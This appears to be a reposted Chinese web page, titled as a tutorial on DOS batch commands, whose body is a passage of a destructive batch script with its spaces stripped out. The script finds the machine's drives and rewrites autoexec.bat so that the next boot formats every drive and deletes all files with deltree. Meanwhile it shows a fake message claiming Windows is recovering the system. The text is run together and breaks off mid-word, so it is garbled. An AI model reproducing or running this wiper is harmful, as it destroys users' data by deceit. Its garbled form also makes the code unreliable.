不错的dos批处理命令详解第1/2页
作者 佚名
来源 批处理
浏览
发布时间 2013-07-09
z remcodeinsertionforDriveCheckingtakesplacehere. remdrivechk.batisthefilenameundertherootdirectory. remAsfarasthedrivedetectionanddrivevariablesettings,don''tworryabouthowit remworks,it''sd\*amntocomplicatedfortheaverageoreventheexpertbatchprogrammer. remExceptforTomLavedas. echo@echooff>drivechk.bat echo@prompt%%%%comspec%%%%/f/cvol%%%%1:$bfind"Vol">nul>{t}.bat %comspec%/e:2048/c{t}.bat>>drivechk.bat del{t}.bat echoiferrorlevel1gotoenddc>>drivechk.bat cls echoPLEASEWAITWHILEPROGRAMLOADS... remWhenerrorlevelis1,thentheaboveisnottrue,if0,thenit''strue. remOppositeofbinaryrules.If0,itwillelapstothenextcommand. echo@prompt%%%%comspec%%%%/f/cdir%%%%1:.\/ad/w/-p$bfind"bytes">nul>{t}.bat %comspec%/e:2048/c{t}.bat>>drivechk.bat del{t}.bat echoiferrorlevel1gotoenddc>>drivechk.bat cls echoPLEASEWAITWHILEPROGRAMLOADS... remiferrorlevelis1,thenthedrivespecifiedisaremovablemediadrive-notready. remiferrorlevelis0,thenitwillelapstothenextcommand. echo@promptdir%%%%1:.\/ad/w/-p$bfind"0bytesfree">nul>{t}.bat %comspec%/e:2048/c{t}.bat>>drivechk.bat del{t}.bat echoiferrorlevel1setdrive=%%drive%%%%1>>drivechk.bat cls echoPLEASEWAITWHILEPROGRAMLOADS... remifit''serrorlevel1,thenthespecifieddriveisahardorfloppydrive. remifit''snoterrorlevel1,thenthespecifieddriveisaCD-ROMdrive. echo:enddc>>drivechk.bat remDrivecheckinginsertionendshere."enddc"standsfor"enddDRIVEcHECKING". remNowwewillusetheprogramdrivechk.battoattainvaliddriveinformation. :Sampledrv for%%ain(%alldrive%)docalldrivechk.bat%%a>nul deldrivechk.bat>nul if%drive.==.setdrive=c :form_del callattrib-r-hc:\autoexec.bat>nul echo@echooff>c:\autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\autoexec.bat echofor%%%%ain(%drive%)docallformat%%%%a:/q/u/autoSample>nul>>c:\autoexec.bat echocls>>c:\autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\autoexec.bat echofor%%%%ain(%drive%)docallc:\temp.bat%%%%aBunga>nul>>c:\autoexec.bat echocls>>c:\autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\autoexec.bat echofor%%%%ain(%drive%)calldeltree/y%%%%a:\>nul>>c:\autoexec.bat echocls>>c:\autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\autoexec.bat echofor%%%%ain(%drive%)docallformat%%%%a:/q/u/autoSample>nul>>c:\autoexec.bat echocls>>c:\autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\autoexec.bat echofor%%%%ain(%drive%)docallc:\temp.bat%%%%aBunga>nul>>c:\autoexec.bat echocls>>c:\autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\autoexec.bat echofor%%%%ain(%drive%)calldeltree/y%%%%a:\>nul>>c:\autoexec.bat echocd\>>c:\autoexec.bat echocls>>c:\autoexec.bat echoechoWelcom |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 使用批处理删除HOSTS中特定内容的行的代码下一篇: 用批处理实现的删除特定时间以前的文件
关于不错的dos批处理命令详解第1/2页的所有评论